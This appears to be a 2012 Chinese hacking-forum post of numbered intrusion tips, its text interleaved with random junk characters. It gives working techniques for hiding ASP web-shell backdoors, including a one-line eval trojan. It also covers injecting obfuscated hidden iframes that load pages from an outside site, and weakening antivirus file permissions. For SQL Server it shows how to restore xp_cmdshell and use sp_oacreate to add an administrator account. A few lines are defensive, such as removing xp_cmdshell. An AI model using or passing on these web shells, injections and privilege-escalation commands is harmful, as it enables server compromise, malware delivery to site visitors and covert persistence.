( {$ ^( P$ R$ y) ^0 i @用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。, ?+ |' t3 Z- q5 r+ [# a" E
: _2 `' b: ~0 D; J53、隐藏ASP后门的两种方法
* W6 V/ F( X; V o: H9 S1、建立非标准目录:mkdir images..\
, ~# q" a8 D% }: [8 s$ }, Y( ?; c拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
* c f1 X6 {& ?! C通过web访问ASP木马:http://ip/images../news.asp?action=login
* w+ [( g* i: w6 ?0 e% d如何删除非标准目录:rmdir images..\ /s- T6 ?' @. i' E5 a2 s; ?
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
% k8 o' X4 E e" S! fmkdir programme.asp" t f% m3 ~! I- C, |
新建1.txt文件内容:<!--#include file=”12.jpg”-->% _# \6 [/ c5 W3 u- {' O
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件" r, C4 N' D( M: Q3 K3 j) p x3 B
attrib +H +S programme.asp
, `9 Q" U0 }) o- m) K0 T# W5 @通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt% w0 z4 x7 W+ V$ u7 O6 U
* Z: y) D* I2 K
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。! P' v7 f4 @6 J8 l
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。4 u# P* w) \1 t% m$ N0 J. o$ H
9 w' C7 ]4 n3 E' X# n0 C55、JS隐蔽挂马
7 g( k9 @7 j. M5 Q9 t3 m1.; W$ ?2 W, |7 S" _4 ?1 ]( p
var tr4c3="<iframe src=ht";8 j# V: J' L) G1 b) v' ]
tr4c3 = tr4c3+"tp:/";$ c5 V# \9 s- D# |0 G. o
tr4c3 = tr4c3+"/ww";! _! U0 n3 y' f( _5 V) ~7 ]) M
tr4c3 = tr4c3+"w.tr4";' ~3 x! c* R* f, w, P6 w
tr4c3 = tr4c3+"c3.com/inc/m";
+ z# S' X3 ]2 K5 Dtr4c3 = tr4c3+"m.htm style="display:none"></i";9 j* x+ A0 b, {! Y
tr4c3 =tr4c3+"frame>'";/ J+ c9 t) E3 b; B
document.write(tr4c3);
# Q# a/ R. L6 O! j" `- r# Z避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
, Q2 Z5 ?( j( j; J4 u2 r/ Y( x; ~: d
2.
5 Y9 o+ ?# z- z+ w! Y转换进制,然后用EVAL执行。如
! y5 o& F0 B3 |! Zeval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
# c9 X' O1 g: j4 h; n6 }3 o不过这个有点显眼。6 H- ?" r6 [/ f4 o
3.$ z6 {. B) H. n1 B. j
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');1 I% U$ q5 ^: a9 ]% t. d
最后一点,别忘了把文件的时间也修改下。
1 U9 s5 A* M: \$ J1 i8 U
* R, u7 q- j/ W$ x) a$ a56.3389终端入侵常用DOS命令
# F7 J# \% U, I! c* e* l7 `# \taskkill taskkill /PID 1248 /t
/ E( p" K$ }/ Y& D* o1 k. K$ e4 L
tasklist 查进程
# e" u) S1 W& \ ^" t0 r2 Z& o4 X# ?* g" w
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
' v: f+ y2 d. y/ T* _iisreset /reboot @. x1 l2 Z# }
tsshutdn /reboot /delay:1 重起服务器
/ h8 L8 Y0 L% h# _+ `. X
2 m, ~$ T8 }+ T; K/ |; Llogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
$ H; H& ] |( A# o6 \, n3 L9 A2 D
query user 查看当前终端用户在线情况
! c* h! T% {4 U8 }, {, x# v7 g
0 Z; [5 ^- T' Q要显示有关所有会话使用的进程的信息,请键入:query process *. D. _) q+ G3 w! b
1 ~( M* a4 U+ U# P要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2: V+ ~; `0 Y# G- o
9 [) A0 N4 ?6 S( I
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
7 M* a3 S c0 c2 J& e' M! i' I, g6 R4 r. n& V6 n7 U
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02' F7 V, u0 i1 ~, | {$ |
* @5 q' ]4 U t) F0 I
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启" H9 ]* m7 h6 E+ f
' A/ @& T. J9 k* U2 t, P3 l命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
3 B8 ?4 f7 ~1 |6 c9 D
5 @& f2 f9 Q! H, `2 U. P" ^命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。' a) U6 l0 ~! \: ~( y+ b1 e
' P# g* u) r! a9 t6 m3 `8 k命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
' P2 d( c! P( j% F y' \" `3 @! \" U! p
56、在地址栏或按Ctrl+O,输入:% A D) c6 L9 k& [
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;* @. y) g" n" F, Y
+ w, u* C2 b8 `+ n# V
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
6 d7 b' G U8 x5 D8 k/ {( c) m9 s' R0 X8 n* E$ p$ P
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,( N& e8 Y/ E( K+ M1 x
用net localgroup administrators是可以看到管理组下,加了$的用户的。
' X- ~' E5 [7 C* h1 N! T: k; {. f4 L
2 @# O3 }5 [% {: C: X( t58、 sa弱口令相关命令
' j8 s6 X/ m' w% g! k) h% V& o+ J, e1 t& Q7 f
一.更改sa口令方法:9 h7 r: { Y% l; F) x2 j: U: _
用sql综合利用工具连接后,执行命令:
% b5 _0 X6 o( E& ` C$ Mexec sp_password NULL,'20001001','sa'
0 F. L. w% K2 Y2 R(提示:慎用!)
; H- m1 Z4 _8 g6 U) g$ }: P! d3 i
二.简单修补sa弱口令./ y5 r6 R: q7 G( q
/ w, H# s$ n" t9 ^# h) y: M9 T
方法1:查询分离器连接后执行:
1 Q) y2 V2 |0 Y- Yif exists (select * from
: x8 _. w1 Y- M- v4 ddbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
. D8 X+ A8 ]% T$ qOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
# u8 z* Z/ Z! \) x3 y. }9 ]9 L; p& k6 f# `. n
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'; e2 l1 [9 m: h) v! l- U
* Q ?' h( @3 m- @) z6 H& TGO
$ h% S& i; O5 h! N8 @4 h9 H' t% K0 j2 `: G# U4 ~
然后按F5键命令执行完毕
& p. x2 B, L I8 M- J1 |3 C5 C+ L7 z' v' Y v& `
方法2:查询分离器连接后0 \6 W9 ~7 u D- ^0 J
第一步执行:use master
2 b! q1 z1 e8 u) t: K第二步执行:sp_dropextendedproc 'xp_cmdshell'
8 {3 O4 I; u1 R8 Y \然后按F5键命令执行完毕9 i$ q3 p8 U+ R1 q. h, Q7 v3 V& j! t
* p& `) Q1 z$ k& ]
3 @' w$ a$ S& E3 X三.常见情况恢复执行xp_cmdshell.* M' t3 [8 G8 ?2 G# V, R
4 x/ Q$ r& |* g, c
3 z( N r- q3 W
1 未能找到存储过程'master..xpcmdshell'.2 i$ r: l! H* R# _( @, m# }
恢复方法:查询分离器连接后,- B( X3 _1 l$ a: k
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int# o4 C% X+ F4 T2 @% \
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
% `& }% ^% ^. {* I% Y然后按F5键命令执行完毕
' z5 Q L! b/ S% }2 T9 g8 q9 M9 V. M! A
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
; _- I0 u$ v" r2 _: \1 Q V恢复方法:查询分离器连接后,( ]; ]$ d( ?' L2 ^$ g( l S
第一步执行:sp_dropextendedproc "xp_cmdshell"
" t# s$ N |+ v3 U4 I/ ^8 `* m/ r第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 r5 F( ]0 L8 z3 p然后按F5键命令执行完毕
) z) B% d% F+ V; a/ U, c) E ^ O m6 m. [
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)4 F8 B8 ~7 U, n
恢复方法:查询分离器连接后,: R: `8 }# x9 u; Q
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'2 K' x8 m0 G* g$ {+ m
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
5 h9 \9 v) ?' G4 R然后按F5键命令执行完毕2 }# ?; b! ^9 G0 F* C. w
7 m: {4 f4 H$ n( o, k2 L四.终极方法.7 b: Y: }5 K1 {' J' ?4 M d& m; ^
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:$ N; ^9 K0 \3 B" t' F/ R0 q
查询分离器连接后,; ~! r4 v& X$ D" ^( z+ c0 C
2000servser系统:
: K" x+ `& N! [ m, E" Ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
8 _: z9 n7 T# p5 V
' O q- w2 E, t5 Hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'' |2 K2 }) I% X
9 C6 t9 s. T( c% W8 @2 A# m% ?- Y2 pxp或2003server系统:2 g# c9 B3 z3 e, S2 S) w' x
. e2 o4 t# C! i$ I" N+ i% mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ s8 p, X: v: C& W8 s% y1 t4 c) s! O0 N3 @# j, Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
+ Y* s8 s4 u* q! e7 k5 r/ d, E |
发表于 2012-9-15 14:13:15
收藏
支持
反对